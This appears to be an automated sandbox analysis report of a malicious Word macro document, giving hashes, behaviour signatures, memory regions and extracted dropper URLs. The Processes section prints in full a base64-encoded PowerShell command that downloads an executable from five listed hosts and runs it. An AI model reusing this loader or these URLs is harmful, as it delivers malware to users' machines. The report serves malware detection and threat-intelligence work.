Analysis

  • max time kernel
    70s
  • max time network
    65s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    08/05/2023, 19:04

General

  • Target

    1.doc

  • Size

    196KB

  • MD5

    1f674e21ea4101caaebcefc455da7eee

  • SHA1

    d5749b03b464e0e380d822f35b8f116e74d81d79

  • SHA256

    da1c259d333f72f05be637093cd9a53d69b9650e369956701567c747ebbad495

  • SHA512

    eb39a18fd234776e1f948edebf8c524cf968d7fe5e06056ec2d167128cd49c527ecb9ab8798ba4902f07d396e185d077efaeb482abfb12d7129194ed13ac1690

  • SSDEEP

    3072:dEd93LpGo0aQLZT1feaEecujUUqq2FoLyX6bXiuWxO/:dEd2VbGTVM/qULhbSuWxO/

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://healthytick.com/wp-content/uploads/ustpcF6FMZpDg_9RwPnGG

exe.dropper

http://ftpcm.com/BZCEsFUe653snDRB

exe.dropper

http://protecaoportal.com.br/BdSyFxrniPRjsN_K

exe.dropper

http://palmer-llc.kz/TxIvOOt9Uw

exe.dropper

http://www.armand-productions.com/B1kK33Yc9ULW_wb1

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe
      powersheLl -e JAB3ADkAXwA4ADQAXwBfAD0AKAAnAHUAXwAnACsAJwA2ADEAMQAnACsAJwAzADYANwAnACkAOwAkAGsANwBfAF8AOQBfADEAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYgA4ADcANgA0AF8APQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBoAGUAYQAnACsAJwBsACcAKwAnAHQAaAAnACsAJwB5ACcAKwAnAHQAaQBjAGsALgBjACcAKwAnAG8AJwArACcAbQAvAHcAcAAnACsAJwAtAGMAbwAnACsAJwBuAHQAZQBuAHQALwB1AHAAJwArACcAbABvAGEAZAAnACsAJwBzACcAKwAnAC8AdQBzAHQAJwArACcAcABjAEYAJwArACcANgAnACsAJwBGAE0AWgBwAEQAZwBfADkAUgB3AFAAbgBHACcAKwAnAEcAQABoACcAKwAnAHQAdABwADoALwAnACsAJwAvAGYAJwArACcAdAAnACsAJwBwACcAKwAnAGMAJwArACcAbQAnACsAJwAuAGMAbwBtAC8AQgBaACcAKwAnAEMARQBzAEYAVQAnACsAJwBlACcAKwAnADYAJwArACcANQAzAHMAbgAnACsAJwBEAFIAJwArACcAQgAnACsAJwBAAGgAdAB0AHAAOgAnACsAJwAvACcAKwAnAC8AJwArACcAcAAnACsAJwByACcAKwAnAG8AdABlAGMAJwArACcAYQAnACsAJwBvAHAAbwByAHQAYQAnACsAJwBsAC4AYwAnACsAJwBvACcAKwAnAG0AJwArACcALgBiAHIALwAnACsAJwBCAGQAUwB5ACcAKwAnAEYAJwArACcAeAByAG4AJwArACcAaQBQAFIAagBzAE4AXwBLAEAAaAB0AHQAcAA6AC8ALwAnACsAJwBwAGEAbABtAGUAJwArACcAcgAnACsAJwAtAGwAbAAnACsAJwBjAC4AJwArACcAawB6ACcAKwAnAC8AVAB4AEkAdgBPAE8AJwArACcAdAA5AFUAdwAnACsAJwBAAGgAdAB0ACcAKwAnAHAAJwArACcAOgAvACcAKwAnAC8AdwB3AHcALgBhAHIAbQBhAG4AZAAtACcAKwAnAHAAJwArACcAcgBvAGQAdQBjAHQAaQAnACsAJwBvAG4AcwAuAGMAbwBtAC8AQgAxAGsASwAzACcAKwAnADMAWQBjADkAVQBMAFcAXwAnACsAJwB3ACcAKwAnAGIAJwArACcAMQAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABEAF8AMQAyADgAXwA9ACgAJwB3ACcAKwAnAF8AMQA5AF8AMAAnACkAOwAkAHYAOQA3ADcAMwA2AF8AIAA9ACAAKAAnADIAJwArACcAOAA0ACcAKQA7ACQAagA4ADgAMQA3ADcAOAA3AD0AKAAnAHIAOQA0ADEAMAAnACsAJwA0ACcAKQA7ACQARwBfAF8ANQA1ADgANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdgA5ADcANwAzADYAXwArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEsAXwA5AF8AOQA3ACAAaQBuACAAJABiADgANwA2ADQAXwApAHsAdAByAHkAewAkAGsANwBfAF8AOQBfADEALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQASwBfADkAXwA5ADcALAAgACQARwBfAF8ANQA1ADgANgApADsAJABUAF8AOAA1ADkAXwA9ACgAJwBFAF8ANQAnACsAJwBfAF8AJwArACcAXwA4ADMAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQARwBfAF8ANQA1ADgANgApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEcAXwBfADUANQA4ADYAOwAkAGoAMgA5ADgANwA5ADYAXwA9ACgAJwBqAF8AJwArACcANgA1ADMANwBfACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABQAF8AOAA1ADgANgA5AD0AKAAnAFIAJwArACcAMQAyADEANABfACcAKQA7AA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1936

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1244-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1244-58-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-59-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-60-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-61-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-62-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-63-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-64-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-65-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-66-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-67-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-68-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-78-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-88-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-98-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-108-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-113-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1244-118-0x0000000000610000-0x0000000000710000-memory.dmp

      Filesize

      1024KB

    • memory/1936-163-0x000000001B350000-0x000000001B632000-memory.dmp

      Filesize

      2.9MB

    • memory/1936-164-0x0000000001CD0000-0x0000000001CD8000-memory.dmp

      Filesize

      32KB

    • memory/1936-165-0x0000000002660000-0x00000000026E0000-memory.dmp

      Filesize

      512KB

    • memory/1936-166-0x0000000002660000-0x00000000026E0000-memory.dmp

      Filesize

      512KB

    • memory/1936-167-0x0000000002660000-0x00000000026E0000-memory.dmp

      Filesize

      512KB

    • memory/1936-172-0x0000000002660000-0x00000000026E0000-memory.dmp

      Filesize

      512KB

    • memory/1936-173-0x0000000002660000-0x00000000026E0000-memory.dmp

      Filesize

      512KB

    • memory/1936-174-0x0000000002660000-0x00000000026E0000-memory.dmp

      Filesize

      512KB

    • memory/1936-175-0x0000000002660000-0x00000000026E0000-memory.dmp

      Filesize

      512KB